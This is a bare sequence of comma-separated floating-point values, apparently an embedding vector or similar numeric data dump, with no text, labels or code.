-0.00518766650930047, 0.033432453870773315, -0.0039528608322143555, -0.002521524904295802, -0.027647778391838074, -0.04503146559000015, -0.0031463438645005226, -0.027128640562295914, 0.0029257102869451046, 0.003721103072166443, -0.04835394769906998, 0.03553866595029831, -0.05250704661011696, -0.018703781068325043, -0.037852536886930466, -0.01975688897073269, -0.016760723665356636, -0.02536357380449772, 0.01938607543706894, -0.003785995300859213, 0.02000904083251953, 0.013504990376532078, 0.022337744012475014, -0.02015736512839794, -0.01897076517343521, 0.02484443597495556, 0.01916358806192875, 0.06894145160913467, -0.01923775114119053, -0.05396062880754471, 0.037555888295173645, -0.005069006234407425, 0.04046305641531944, 0.006567088887095451, -0.009277728386223316, 0.017917659133672714, 0.030614277347922325, -0.015440631657838821, 0.009655957110226154, -0.023479845374822617, -0.022753052413463593, 0.004805729724466801, 0.017205698415637016, -0.02116597630083561, 0.016731059178709984, -0.012444466352462769, -0.020038705319166183, 0.008150458335876465, -0.017546845600008965, 0.006856322754174471, -0.0033577068243175745, -0.044942472130060196, 0.005506565328687429, -0.0016973940655589104, -0.0009390825871378183, -0.021581286564469337, 0.025600893422961235, -0.013727477751672268, -0.022738220170140266, 0.03779320791363716, -0.03969176858663559, -0.010167677886784077, -0.02306453511118889, 0.007479287683963776, 0.006934192962944508, 0.0026272062677890062, -0.02514108456671238, -0.02603103592991829, 0.018065983429551125, 0.016241585835814476, 0.04731567203998566, 0.023554008454084396, -0.010360500775277615, -0.030287962406873703, -0.02294587530195713, 0.008528687059879303, -0.025823380798101425, 0.028938205912709236, -0.0070231882855296135, 0.036369286477565765, 0.033254463225603104, 0.008721509017050266, -0.006700581405311823, -0.011769588105380535, -0.008091128431260586, 0.003116678912192583, -0.0033743935637176037, -0.02005353756248951, -0.008432275615632534, -0.005276661366224289, -0.02124013751745224, 0.038564495742321014, 0.04627739638090134, 0.025600893422961235, 0.02425113506615162, 0.024933431297540665, 0.049629539251327515, -0.04488314315676689, -0.026520507410168648, -0.006070200353860855, -0.011087292805314064, 0.03969176858663559, 0.016419576480984688, -0.007831559516489506, -0.02818174846470356, 0.00003470572846708819, -0.0027273257728666067, 0.01926741562783718, -0.07250125706195831, 0.01475833635777235, 0.00019432890985626727, -0.01449876744300127, -0.02528941072523594, 0.00749041186645627, -0.045832421630620956, -0.01214040070772171, -0.04384486749768257, -0.032661162316799164, -0.021863102912902832, -0.008380361832678318, -0.008135625161230564, -0.07730698585510254, -0.03361044079065323, -0.02109181322157383, 0.03903913497924805, -0.03331379219889641, -0.027692275121808052, 0.0072123026475310326, -0.00777964573353529, -0.005788382608443499, 0.02606070041656494, -0.04633672535419464, 0.007482995744794607, 0.03197886794805527, 0.012563126161694527, -0.009752367623150349, 0.0009446447947993875, 0.05069747939705849, -0.002521524904295802, -0.027054477483034134, 0.030762601643800735, -0.03292814642190933, -0.038564495742321014, 0.008662179112434387, -0.026075532659888268, 0.05137977749109268, -0.008061463013291359, -0.05123145133256912, -0.02254539728164673, 0.03441139683127403, -0.010805475525557995, -0.01864445023238659, -0.013764559291303158, -0.02684682235121727, -0.04280659183859825, 0.00029595469823107123, -0.015900438651442528, 0.02773677185177803, -0.024340130388736725, -0.0011142914881929755, -0.03761521726846695, -0.02978365682065487, -0.01640474423766136, -0.007316130213439465, -0.021299468353390694, 0.018510958179831505, -0.021892767399549484, -0.008469357155263424, 0.010716480202972889, 0.0291458610445261, 0.03877215087413788, 0.0324535071849823, -0.01299326866865158, 0.012704035267233849, -0.020468847826123238, -0.04046305641531944, -0.03168221563100815, -0.02376166358590126, -0.005895918235182762, -0.05057882145047188, 0.0376448817551136, -0.0037099786568433046, -0.03292814642190933, -0.039157796651124954, 0.021299468353390694, -0.026639167219400406, 0.002510400488972664, 0.016627231612801552, 0.033106137067079544, -0.029768824577331543, -0.02124013751745224, -0.01800665445625782, 0.006396515294909477, -0.0042717596516013145, 0.018110480159521103, 0.0413530059158802, -0.012088486924767494, 0.024073146283626556, -0.047730982303619385, 0.030881263315677643, 0.03200853243470192, 0.013949965126812458, 0.014876996167004108, -0.004624031484127045, -0.05485058203339577, 0.022293245419859886, 0.026045868173241615, 0.0025511898566037416, 0.019667893648147583, -0.01874827779829502, -0.007527492940425873, -0.04440850019454956, -0.04289558529853821, 0.02583821304142475, 0.01449876744300127, -0.020958321169018745, -0.003849033499136567, 0.02576404996216297, 0.013371497392654419, 0.03289848193526268, 0.008491605520248413, -0.040344398468732834, -0.011346861720085144, -0.018837273120880127, -0.022070758044719696, -0.011035379022359848, -0.008714092895388603, 0.0013720061397179961, -0.012526045553386211, -0.003287252504378557, -0.010976049117743969, -0.012985852546989918, -0.03859416022896767, 0.021432960405945778, 0.02517075091600418, -0.008536103181540966, 0.01857028901576996, 0.053901299834251404, -0.04627739638090134, -0.007471871096640825, -0.0368439257144928, 0.007012063637375832, 0.03455972298979759, 0.00889208260923624, 0.026594670489430428, -0.03129657357931137, -0.029323849827051163, 0.0011587889166548848, 0.010056434199213982, 0.01533680409193039, -0.012437050230801105, -0.01290427427738905, 0.00004875604645349085, -0.04651471599936485, 0.02561572566628456, 0.001972722355276346, -0.0030629110988229513, -0.013037766329944134, 0.01501790527254343, 0.01007868256419897, -0.018763110041618347, 0.025378406047821045, -0.00618144404143095, -0.006429888308048248, 0.015989433974027634, 0.028359737247228622, 0.014988239854574203, 0.0015092067187651992, -0.011613846756517887, 0.028077920898795128, -0.03168221563100815, 0.0055213975720107555, -0.022248748689889908, 0.012652121484279633, -0.021774107590317726, 0.02539323829114437, -0.009774616919457912, -0.002927564550191164, 0.05502856895327568, -0.047879304736852646, 0.026565006002783775, 0.005043049808591604, 0.015247808769345284, 0.0015249663265421987, -0.002254539867863059, -0.0075571583583951, 0.021566452458500862, -0.011836334131658077, 0.0202760249376297, -0.006593045778572559, 0.013482741080224514, -0.010241840034723282, -0.00652629928663373, 0.023405682295560837, -0.01659756526350975, 0.037110913544893265, -0.044497497379779816, -0.04746399447321892, -0.0295166727155447, -0.019697558134794235, 0.017947323620319366, -0.0018002944998443127, -0.006452137138694525, 0.01711670309305191, 0.04366687685251236, 0.012058821506798267, -0.010849973186850548, -0.028018590062856674, -0.021937265992164612, 0.03147456422448158, -0.012214562855660915, 0.029650164768099785, 0.004761232063174248, -0.01960856281220913, -0.03660660609602928, -0.030020978301763535, -0.02250090055167675, 0.0019059760961681604, -0.013527238741517067, 0.008135625161230564, -0.020394686609506607, 0.015752114355564117, 0.006196276284754276, -0.028611890971660614, -0.0029053157195448875, -0.010790643282234669, -0.01427628006786108, 0.057906076312065125, -0.02595687285065651, 0.002771823201328516, 0.00042991069494746625, 0.010041601955890656, -0.013631066307425499, 0.020854493603110313, -0.014521016739308834, 0.01494374219328165, -0.01748751662671566, -0.012933938764035702, 0.008343280293047428, 0.025348739698529243, -0.009648540057241917, -0.000020394685634528287, -0.004256926942616701, 0.034886036068201065, -0.006845198106020689, -0.0017752647399902344, -0.011799252592027187, 0.0027959260623902082, -0.008209788240492344, 0.005577019415795803, -0.04114535078406334, 0.003038808237761259, 0.008840168826282024, -0.0024807355366647243, -0.033551111817359924, 0.00005208756556385197, 0.014417189173400402, 0.024458790197968483, 0.04707835242152214, 0.014469102956354618, -0.005766133777797222, 0.009737535379827023, 0.02788509801030159, -0.02131430059671402, -0.023746831342577934, 0.012674369849264622, 0.011888247914612293, -0.006826657801866531, -0.03188987076282501, 0.015247808769345284, 0.012006907723844051, -0.029175525531172752, -0.003997358493506908, -0.012674369849264622, -0.009552129544317722, -0.010071266442537308, -0.01500307209789753, 0.03159322217106819, -0.005402737762778997, 0.006448429077863693, 0.050104182213544846, -0.01859995350241661, 0.006003453861922026, 0.01916358806192875, 0.03972143307328224, -0.011992075480520725, -0.0012913544196635485, 0.007523784879595041, 0.04218362644314766, -0.024755440652370453, -0.021180808544158936, 0.021299468353390694, -0.023301854729652405, 0.017250197008252144, -0.014528432860970497, -0.0014619281282648444, -0.00758311478421092, -0.0055399383418262005, 0.01260762382298708, -0.0361023023724556, 0.029101362451910973, -0.016478905454277992, 0.00032979133538901806, 0.004449749831110239, -0.00703802052885294, 0.02405831217765808, 0.0018661137437447906, 0.000441266834968701, 0.028864042833447456, -0.014825082384049892, 0.002986894454807043, 0.03556833043694496, -0.024147307500243187, -0.026565006002783775, 0.008528687059879303, -0.010019352659583092, -0.047730982303619385, 0.001131905009970069, -0.029976479709148407, -0.008736342191696167, 0.02171477861702442, 0.007690650410950184, 0.016849718987941742, 0.018911436200141907, -0.021151144057512283, -0.032067861407995224, -0.015410966239869595, -0.015047569759190083, -0.01238513644784689, 0.04393386095762253, -0.0265798382461071, 0.00797988474369049, -0.020987985655665398, 0.0250965878367424, 0.029457341879606247, 0.021477458998560905, -0.030095139518380165, 0.011895664036273956, -0.0025270869955420494, 0.02350950986146927, 0.012896858155727386, 0.002380616031587124, -0.012310974299907684, 0.011317196302115917, 0.013341832906007767, -0.01142102386802435, -0.026565006002783775, 0.0005246996297501028, -0.013720061630010605, -0.012488964013755322, 0.0516170971095562, -0.006537423934787512, 0.005918167065829039, 0.02161095105111599, -0.0012570542749017477, 0.03524201735854149, 0.000055477023124694824, -0.051557764410972595, -0.022337744012475014, -0.023672668263316154, 0.006133238319307566, -0.0106942318379879, 0.0033725393004715443, -0.0028385694604367018, -0.026001369580626488, 0.024977928027510643, -0.050994131714105606, -0.010345667600631714, -0.002248977543786168, -0.00876600667834282, -0.004935514181852341, 0.01481766626238823, -0.017739668488502502, -0.03144489601254463, -0.0069712745025753975, 0.0008204226032830775, -0.0028515479061752558, 0.02479993738234043, 0.02235257625579834, 0.0331951305270195, -0.005132044665515423, -0.01637507788836956, -0.013653315603733063, 0.0023249941878020763, -0.021774107590317726, -0.018926268443465233, -0.018614785745739937, 0.007660985458642244, 0.014773168601095676, -0.007223426830023527, 0.006162903271615505, 0.007394000422209501, 0.005706803873181343, -0.05072714760899544, 0.02554156258702278, 0.03969176858663559, -0.004887308459728956, 0.0032779821194708347, 0.026728162541985512, 0.03227551653981209, -0.025259746238589287, 0.007653569336980581, 0.0007527493289671838, 0.025867877528071404, 0.020439183339476585, 0.007334670517593622, -0.01306743174791336, 0.010976049117743969, -0.026861654594540596, -0.013000684790313244, -0.00369885447435081, 0.02956116944551468, 0.026950649917125702, 0.02086932584643364, 0.014394939877092838, 0.007787061855196953, 0.015648286789655685, -0.023643003776669502, 0.017057374119758606, 0.018392298370599747, -0.035331010818481445, -0.007234551478177309, 0.02457745000720024, -0.0054880245588719845, 0.02242673747241497, 0.015092067420482635, 0.016909047961235046, 0.0010558884823694825, -0.027558783069252968, -0.01908942684531212, 0.011495186947286129, 0.030317626893520355, -0.01409087423235178, -0.006459553260356188, 0.00016176693316083401, 0.003129657357931137, 0.011502603068947792, 0.03438173234462738, 0.005135752726346254, 0.0016037638997659087, 0.011443273164331913, 0.028344905003905296, 0.04161999002099037, -0.026016203686594963, 0.007586823310703039, 0.009515048004686832, 0.014736087992787361, 0.02213008888065815, -0.0295166727155447, 0.012451882474124432, 0.032661162316799164, -0.021403295919299126, 0.006923068780452013, -0.0068414900451898575, 0.008068879134953022, 0.017294693738222122, -0.005373072810471058, 0.0029664996545761824, -0.02502242475748062, -0.018258806318044662, 0.015618621371686459, -0.022560231387615204, -0.021670280024409294, -0.003455972298979759, -0.011769588105380535, 0.018214307725429535, -0.06811083108186722, 0.016478905454277992, 0.016315748915076256, 0.01908942684531212, 0.028196580708026886, -0.011613846756517887, 0.009181316941976547, -0.022382240742444992, 0.002235999098047614, 0.00579209066927433, -0.008432275615632534, -0.037407562136650085, 0.02862672321498394, -0.027781270444393158, 0.03126690909266472, -0.013015517964959145, -0.025348739698529243, 0.021151144057512283, 0.018540622666478157, -0.007660985458642244, -0.011228201910853386, 0.007375460118055344, 0.008276534266769886, -0.02168511413037777, -0.021447792649269104, -0.025467399507761, -0.004071521107107401, -0.007883473299443722, -0.018555456772446632, 0.052032407373189926, 0.035331010818481445, 0.030169302597641945, -0.0361616313457489, 0.01630091667175293, 0.018065983429551125, 0.003784141270443797, 0.004049272276461124, -0.012837527319788933, 0.00844710785895586, 0.024532953277230263, -0.00900332722812891, 0.014661924913525581, 0.012214562855660915, 0.00505788205191493, 0.0029590835329145193, -0.022189417853951454, 0.02264922484755516, -0.016493739560246468, 0.02514108456671238, 0.004386711400002241, -0.007601655554026365, 0.006504050921648741, -0.019964544102549553, 0.0013655169168487191, -0.04690036177635193, 0.0456840954720974, -0.003945444710552692, -0.010790643282234669, -0.009040407836437225, 0.023034870624542236, -0.0011560078710317612, -0.024295633658766747, -0.014661924913525581, 0.00652629928663373, 0.01585594192147255, 0.0042383866384625435, -0.011599014513194561, -0.031652551144361496, -0.012629873119294643, 0.01652340404689312, 0.015247808769345284, 0.01334924902766943, 0.03453005850315094, 0.011688008904457092, -0.010390165261924267, 0.004980011377483606, -0.0017938052769750357, 0.015722448006272316, 0.018243974074721336, -0.013504990376532078, 0.022782718762755394, -0.020543010905385017, -0.0033298959024250507, 0.004045564215630293, -0.00614436250180006, -0.02573438547551632, -0.0003589928091969341, -0.03571665659546852, 0.02936834841966629, 0.0069712745025753975, -0.01859995350241661, -0.016923880204558372, 0.0029442510567605495, -0.004027023445814848, 0.010353083722293377, -0.017991820350289345, 0.00771289924159646, -0.01573728211224079, -0.041857313364744186, 0.0010354937985539436, -0.023895155638456345, 0.01251121237874031, -0.047879304736852646, -0.004201305098831654, 0.0030109973158687353, -0.03289848193526268, 0.0375855527818203, -0.01409087423235178, 0.02235257625579834, 0.010219591669738293, -0.011517435312271118, 0.017161201685667038, -0.004371879156678915, -0.014439437538385391, -0.0014813957968726754, 0.025497065857052803, 0.00614436250180006, -0.005158001556992531, -0.019623395055532455, -0.01834780164062977, 0.010264089331030846, 0.014083457179367542, -0.03657694160938263, -0.03153389319777489, 0.012073653750121593, -0.0055992682464420795, 0.021952098235487938, -0.0036172757390886545, 0.0298874843865633, 0.008410027250647545, -0.018243974074721336, 0.017101870849728584, 0.000033170334063470364, 0.015826275572180748, -0.0037934116553515196, -0.03687359020113945, -0.005098671652376652, 0.026742994785308838, 0.0007175221107900143, 0.026090364903211594, -0.012659537605941296, 0.02064683847129345, 0.005528813693672419, 0.0034541182685643435, -0.007594239432364702, 0.030614277347922325, -0.018184643238782883, 0.020928656682372093, 0.0002655944263096899, -0.010427246801555157, -0.019400907680392265, -0.003480074927210808, -0.012800446711480618, 0.026787493377923965, 0.003491199342533946, -0.028760215267539024, -0.01431336160749197, 0.0013636628864333034, 0.008209788240492344, -0.022515732795000076, 0.03307647258043289, -0.0027940720319747925, 0.010264089331030846, -0.0457434244453907, -0.014513599686324596, -0.003734081517904997, 0.029501840472221375, -0.019252583384513855, 0.00896624568849802, -0.027262132614850998, 0.020409518852829933, 0.0032853984739631414, 0.015588955953717232, 0.008825336582958698, 0.006956441793590784, -0.0030443703290075064, -0.01897076517343521, -0.024903764948248863, -0.01485474780201912, -0.018140146508812904, -0.018140146508812904, 0.03972143307328224, -0.011391359381377697, -0.004887308459728956, 0.0018466460751369596, 0.013764559291303158, -0.02336118556559086, 0.02250090055167675, -0.028522895649075508, -0.01238513644784689, 0.019742056727409363, -0.003170446725562215, -0.0015574123244732618, 0.008380361832678318, -0.011087292805314064, -0.010671982541680336, -0.03628029301762581, -0.029012367129325867, -0.031355902552604675, -0.007368043996393681, 0.011569349095225334, -0.03396642208099365, -0.004709318280220032, -0.01837746612727642, -0.010353083722293377, -0.01504015363752842, 0.029279353097081184, 0.0068155331537127495, -0.01533680409193039, 0.026016203686594963, 0.022174585610628128, -0.002934980671852827, 0.01960856281220913, -0.01578177884221077, 0.004961471073329449, 0.010100931860506535, 0.02462194859981537, -0.005654890090227127, -0.025126252323389053, -0.009678205475211143, -0.06271180510520935, -0.02428080141544342, 0.022263580933213234, 0.0090255755931139, -0.01021217554807663, 0.03174154832959175, 0.0005279442411847413, 0.027306631207466125, -0.002697660820558667, 0.0108796376734972, -0.0024028648622334003, -0.011383943259716034, 0.00013256545935291797, -0.0024492163211107254, -0.020365020260214806, 0.00284969387575984, -0.0031426355708390474, -0.03942478075623512, -0.012778197415173054, -0.002150712301954627, -0.009121987037360668, -0.0031333654187619686, -0.022144921123981476, -0.031355902552604675, -0.00390836363658309, 0.009492799639701843, -0.02339085005223751, 0.023998983204364777, 0.02037985250353813, -0.0006503123440779746, -0.0010429100366309285, -0.003535697003826499, 0.018659284338355064, -0.01785832829773426, -0.007071394007652998, -0.035479336977005005, -0.0015537042636424303, -0.012333222664892673, -0.017101870849728584, 0.05490991100668907, 0.041975971311330795, -0.02425113506615162, -0.021744443103671074, 0.0010836994042620063, -0.021640615537762642, 0.002883066888898611, -0.008639930747449398, 0.023672668263316154, 0.015796611085534096, 0.0016871967818588018, 0.010664566420018673, 0.01007868256419897, 0.01615259051322937, -0.04170898720622063, 0.019727222621440887, 0.0035505294799804688, 0.007245675660669804, -0.012971020303666592, 0.015796611085534096, -0.004857643507421017, -0.0037804332096129656, -0.02119564078748226, 0.009537296369671822, -0.0041864728555083275, -0.014810250140726566, -0.01357173640280962, 0.0028645263519138098, 0.0018012215150520205, 0.001948619494214654, -0.006118405610322952, -0.0008602849557064474, 0.012822695076465607, 0.005224747583270073, -0.01644924096763134, 0.023109033703804016, 0.015010489150881767, 0.009292560629546642, -0.004983719438314438, -0.022337744012475014, -0.02635735087096691, -0.02242673747241497, -0.00028992901206947863, -0.011257866397500038, 0.025645390152931213, -0.03000614419579506, -0.02000904083251953, -0.019208086654543877, -0.011027962900698185, -0.0027310338336974382, 0.023702332749962807, -0.023717164993286133, -0.024295633658766747, 0.0021488582715392113, -0.004327381495386362, 0.007538617588579655, -0.015396133996546268, 0.013393746688961983, 0.07985817641019821, 0.02079516276717186, 0.007935387082397938, -0.017176033928990364, -0.028878875076770782, 0.00649663433432579, 0.012971020303666592, -0.00409376947209239, 0.01897076517343521, -0.00505788205191493, -0.006748787127435207, 0.013275086879730225, -0.030584612861275673, 0.02494826354086399, -0.008795672096312046, 0.01874827779829502, -0.008602849207818508, 0.012266476638615131, -0.017947323620319366, 0.013378913514316082, -0.016627231612801552, 0.016686560586094856, -0.007334670517593622, 0.007564574480056763, -0.019371243193745613, 0.0191932525485754, -0.012963604182004929, -0.0027662611100822687, -0.017843496054410934, -0.007442206144332886, -0.00495776254683733, 0.013593984767794609, 0.0042198458686470985, -0.004149391315877438, 0.0029182941652834415, 0.02702481299638748, -0.02576404996216297, -0.014216950163245201, -0.02082482911646366, -0.008291366510093212, 0.022189417853951454, -0.024043479934334755, 0.0057809664867818356, 0.006748787127435207, 0.008513853885233402, -0.005169125739485025, 0.008714092895388603, 0.033254463225603104, -0.005272953305393457, -0.00037753343349322677, -0.02632768452167511, 0.0015639015473425388, -0.010901886969804764, -0.0018716759514063597, 0.01033825147897005, 0.009455718100070953, 0.0008607484633103013, 0.010983465239405632, 0.007457038853317499, 0.0036061513237655163, 0.00007816031575202942, 0.0017752647399902344, 0.0069786906242370605, -0.03331379219889641, 0.018955932930111885, 0.030643941834568977, -0.00739770894870162, 0.00900332722812891, 0.006370558403432369, 0.018021486699581146, 0.002458486706018448, 0.016360245645046234, -0.013163842260837555, 0.002515962580218911, 0.01901526376605034, -0.0006646813708357513, 0.0008644565823487937, 0.01615259051322937, -0.01085738930851221, -0.013579152524471283, 0.0003242291568312794, 0.026891320943832397, -0.00985619518905878, -0.0018030756618827581, -0.0034207450225949287, 0.023198029026389122, -0.03601330891251564, -0.0041679320856928825, 0.005992329679429531, 0.033847760409116745, -0.015588955953717232, 0.004768648184835911, 0.020735833793878555, -0.0019356410484761, 0.007590531371533871, 0.022738220170140266, 0.004579533822834492, 0.01563345454633236, -0.008751174435019493, -0.019845884293317795, 0.01520331110805273, -0.001157861901447177, 0.021774107590317726, -0.010894469916820526, -0.013490157201886177, 0.004898432642221451, -0.012971020303666592, 0.01730952598154545, -0.011050211265683174, -0.008699260652065277, -0.004216137807816267, -0.0005854201735928655, -0.007471871096640825, 0.0014276279835030437, -0.02840423583984375, -0.020394686609506607, -0.0032779821194708347, 0.011265282519161701, 0.011346861720085144, 0.01457293052226305, -0.023568840697407722, 0.008143042214214802, 0.014825082384049892, -0.011628678999841213, -0.0026364766526967287, 0.022560231387615204, 0.018926268443465233, -0.008135625161230564, 0.023153530433773994, 0.02020186372101307, 0.010034185834228992, 0.0054398188367486, 0.022293245419859886, 0.02491859719157219, -0.00163342896848917, -0.002973916009068489, -0.014839914627373219, 0.008276534266769886, -0.0011717673623934388, -0.0042458027601242065, -0.020409518852829933, 0.004242094699293375, 0.012889441102743149, 0.01264470536261797, -0.0010021206689998507, 0.002026490168645978, -0.02210042253136635, 0.0013015518197789788, 0.012555710040032864, 0.01897076517343521, -0.014454269781708717, -0.03494536876678467, 0.02086932584643364, 0.023998983204364777, 0.00014878850197419524, 0.016731059178709984, 0.017294693738222122, 0.004127142950892448, 0.018926268443465233, 0.007041728589683771, -0.006941609550267458, 0.034737713634967804, 0.008565767668187618, 0.0056771389208734035, 0.004275467712432146, 0.021625783294439316, 0.006255606189370155, -0.0020932364277541637, -0.0169683787971735, -0.002706930972635746, 0.01615259051322937, -0.003359561087563634, -0.04067071154713631, 0.006574505008757114, -0.004646280314773321, 0.009500215761363506, -0.013957381248474121, -0.0009909963700920343, 0.03156355768442154, -0.009885860607028008, 0.0071603888645768166, -0.026387015357613564, -0.021210473030805588, -0.014713838696479797, 0.02227841317653656, -0.013987046666443348, -0.0007476506289094687, 0.010382749140262604, -0.0069008199498057365, 0.01630091667175293, -0.00739029236137867, 0.018688948825001717, -0.031949203461408615, -0.020513346418738365, -0.016137758269906044, -0.023405682295560837, 0.005321159027516842, 0.006003453861922026, -0.009314808994531631, -0.005973788909614086, -0.0008422078099101782, -0.002706930972635746, -0.002947959117591381, 0.011065044440329075, 0.014617427252233028, -0.02287171222269535, -0.0035245725885033607, 0.012110735289752483, 0.003900947282090783, -0.0027810935862362385, -0.000627136614639312, 0.0014535848749801517, -0.02554156258702278, -0.013045182451605797, 0.02729179710149765, -0.004034439567476511, 0.003144489834085107, -0.05621517077088356, -0.006589337717741728, -0.004546160809695721, -0.018703781068325043, 0.019623395055532455, -0.02272338792681694, 0.011791836470365524, 0.03595397621393204, 0.009685621596872807, 0.010479160584509373, -0.021551620215177536, -0.00947055034339428, 0.011821501888334751, -0.021507123485207558, 0.026565006002783775, 0.010278921574354172, -0.009878444485366344, -0.014832498505711555, -0.026164527982473373, 0.008076295256614685, 0.00970787089318037, 0.007564574480056763, 0.002536357380449772, 0.0017187157645821571, 0.009307392872869968, -0.0095966262742877, 0.013260253705084324, -0.000483910262119025, -0.00021657765319105238, 0.005766133777797222, 0.008610265329480171, -0.0025734384544193745, 0.001850354252383113, 0.008936580270528793, -0.005640057846903801, -0.022678891196846962, -0.01325283758342266, -0.016953546553850174, 0.0042903004214167595, 0.011035379022359848, 0.0173391904681921, 0.0032130901236087084, -0.02803342230618, 0.0180511511862278, 0.0005942269926890731, 0.0001608399034012109, -0.013497574254870415, -0.014328193850815296, 0.009136819280683994, -0.01689421571791172, 0.0021859395783394575, -0.01986071653664112, -0.00043222829117439687, -0.013690396212041378, 0.014046376571059227, 0.011458105407655239, -0.021744443103671074, -0.011524851433932781, 0.006593045778572559, -0.013208339922130108, -0.006214817054569721, -0.047137681394815445, 0.0029164401348680258, 0.022782718762755394, -0.018629617989063263, 0.003098138142377138, 0.006010869983583689, -0.02736596018075943, -0.028938205912709236, -0.02072100155055523, -0.00521733146160841, 0.0018911436200141907, -0.012437050230801105, 0.007772229146212339, 0.00011263429041719064, -0.013200923800468445, -0.03055494837462902, 0.006088740658015013, 0.02376166358590126, -0.014750920236110687, 0.0009140527108684182, 0.0010883345967158675, 0.009655957110226154, 0.0006832219660282135, 0.017576511949300766, 0.0420353002846241, 0.010627485811710358, -0.014105706475675106, -0.006422472186386585, -0.019653061404824257, -0.010531074367463589, -0.006155487149953842, -0.012340638786554337, -0.004776064772158861, -0.012481547892093658, -0.014713838696479797, 0.0005506565212272108, 0.0009585502557456493, 0.016093261539936066, -0.025556394830346107, 0.028567392379045486, 0.007764813024550676, 0.021477458998560905, -0.017873160541057587, -0.0035338427405804396, -0.022886546328663826, -0.007838975638151169, 0.006296395789831877, 0.01637507788836956, 0.0016185963759198785, -0.009010743349790573, -0.012488964013755322, -0.0138313053175807, -0.008269118145108223, 0.02057267539203167, -0.022753052413463593, 0.04087836667895317, 0.009796865284442902, 0.005595560185611248, -0.010998297482728958, -0.004868767689913511, -0.009233230724930763, 0.010575572028756142, -0.029427677392959595, 0.02499276027083397, 0.011257866397500038, 0.029309017583727837, -0.0038675740361213684, 0.017591344192624092, 0.030287962406873703, 0.021373631432652473, -0.01946023851633072, -0.027113808318972588, -0.00307218125090003, 0.014565513469278812, -0.035805653780698776, 0.010227007791399956, -0.0213884636759758, 0.002706930972635746, 0.01085738930851221, 0.025749217718839645, 0.0017214969266206026, -0.000080072320997715, -0.019845884293317795, 0.0034281613770872355, -0.010820307768881321, -0.037526220083236694, 0.017517181113362312, 0.01615259051322937, -0.0007073247688822448, -0.008491605520248413, 0.006007161922752857, -0.005339699797332287, 0.006166611332446337, 0.0019449114333838224, 0.024117643013596535, 0.00937413889914751, -0.0127336997538805, -0.0450018011033535, -0.014565513469278812, -0.018911436200141907, 0.016033930703997612, 0.023257357999682426, -0.013193507678806782, -0.00995260663330555, 0.002771823201328516, -0.0011207807110622525, -0.03544967249035835, 0.005224747583270073, -0.007382876239717007, -0.04067071154713631, -0.031622886657714844, 0.011265282519161701, -0.0038156602531671524, -0.003333604196086526, 0.025497065857052803, 0.006552256178110838, -0.004757524002343416, 0.007223426830023527, -0.006689456757158041, 0.017294693738222122, -0.0029386887326836586, -0.0029664996545761824, -0.0001630416081752628, 0.004601782653480768, 0.006066491827368736, 0.0009427907061763108, 0.01527747418731451, 0.020187031477689743, -0.005339699797332287, -0.037407562136650085, 0.03405541554093361, -0.015766946598887444, 0.034441061317920685, -0.009463134221732616, -0.008625098504126072, -0.039929088205099106, -0.002465902827680111, -0.016760723665356636, 0.010605236515402794, -0.0003353535139467567, 0.005732760764658451, -0.006726538296788931, 0.02124013751745224, -0.00531003437936306, -0.03289848193526268, 0.017072206363081932, -0.006752495188266039, 0.000634089345112443, 0.002124755410477519, 0.002013511722907424, 0.0025141085498034954, -0.011376526206731796, 0.01852579042315483, 0.0258085485547781, -0.01095380075275898, 0.0053063263185322285, -0.012058821506798267, 0.015032737515866756, -0.02554156258702278, -0.004197597038000822, -0.0030054349917918444, 0.010605236515402794, -0.0040381476283073425, -0.008721509017050266, -0.027796102687716484, 0.014291112311184406, -0.029531504958868027, -0.005324867088347673, -0.001785462023690343, 0.007223426830023527, -0.0001332607353106141, 0.0005052319611422718, 0.02373199723660946, -0.015069819055497646, 0.0005145022878423333, -0.004171640146523714, -0.01960856281220913, 0.015129148960113525, 0.0154851283878088, -0.009789449162781239, 0.0013553196331486106, 0.0016232315683737397, 0.005369364749640226, -0.0028941913042217493, -0.010130596347153187, 0.014127954840660095, 0.00797988474369049, -0.002608665730804205, -0.0014554389053955674, -0.02531907521188259, -0.009136819280683994, 0.006255606189370155, 0.05046015977859497, 0.0038008277770131826, -0.001928224810399115, -0.009878444485366344, 0.03672526776790619, -0.01857028901576996, 0.0015898584388196468, 0.0018837273819372058, 0.004416376352310181, 0.017161201685667038, -0.010093515738844872, 0.014246614649891853, 0.0014776877360418439, -0.006059075705707073, 0.0042198458686470985, -0.023895155638456345, 0.0009789449395611882, 0.019000431522727013, 0.006644959561526775, 0.0020950904581695795, 0.002191501669585705, -0.02543773502111435, 0.0019337870180606842, 0.007330962456762791, 0.020632006227970123, -0.010323419235646725, -0.019208086654543877, 0.0008871688623912632, -0.0006656083860434592, -0.029724327847361565, 0.012340638786554337, -0.004935514181852341, -0.0037303734570741653, 0.010019352659583092, -0.004546160809695721, -0.013141593895852566, -0.006240773946046829, 0.00031681288965046406, 0.010805475525557995, 0.002139587886631489, -0.001044764183461666, -0.004742691293358803, -0.022248748689889908, 0.015544458292424679, 0.000336744065862149, -0.018140146508812904, 0.0032909605652093887, 0.000060488782764878124, -0.009752367623150349, -0.004802021663635969, 0.007171513047069311, -0.0017882431857287884, 0.007646153215318918, -0.03197886794805527, -0.002647601068019867, 0.008417443372309208, 0.0013506844406947494, 0.011784420348703861, -0.00989327672868967, 0.015307138673961163, -0.008803088217973709, 0.013853553682565689, -0.00464257225394249, -0.019653061404824257, 0.00425321888178587, -0.022738220170140266, 0.020112868398427963, -0.0003209845453966409, -0.004486830905079842, 0.0003339629911351949, -0.008246869780123234, 0.005892210174351931, 0.032987479120492935, 0.009255479089915752, -0.010545906610786915, 0.00995260663330555, 0.013712645508348942, -0.028908539563417435, -0.029472175985574722, 0.0023843240924179554, -0.003530134679749608, 0.025719553232192993, -0.002521524904295802, -0.002575292717665434, -0.023153530433773994, -0.009782033041119576, -0.01719086617231369, 0.021151144057512283, 0.003548675449565053, -0.014009295031428337, 0.01775450073182583, 0.006552256178110838, 0.02390998788177967, 0.019074592739343643, 0.01041241455823183, -0.0002785728720482439, 0.004145683255046606, -0.00872892513871193, -0.007216010708361864, -0.0188224408775568, 0.010041601955890656, 0.006856322754174471, 0.006837781984359026, 0.016197089105844498, 0.012014323845505714, 0.0035764863714575768, -0.006934192962944508, -0.012340638786554337, 0.00473527517169714, -0.014788000844419003, 0.02205592580139637, 0.00889208260923624, -0.02680232562124729, -0.0027180553879588842, 0.010011936537921429, 0.012726283632218838, 0.013749726116657257, -0.0054620676673948765, -0.018837273120880127, -0.019920045509934425, 0.010034185834228992, 0.016478905454277992, -0.010301170870661736, 0.0065819211304187775, -0.0029850404243916273, -0.01290427427738905, 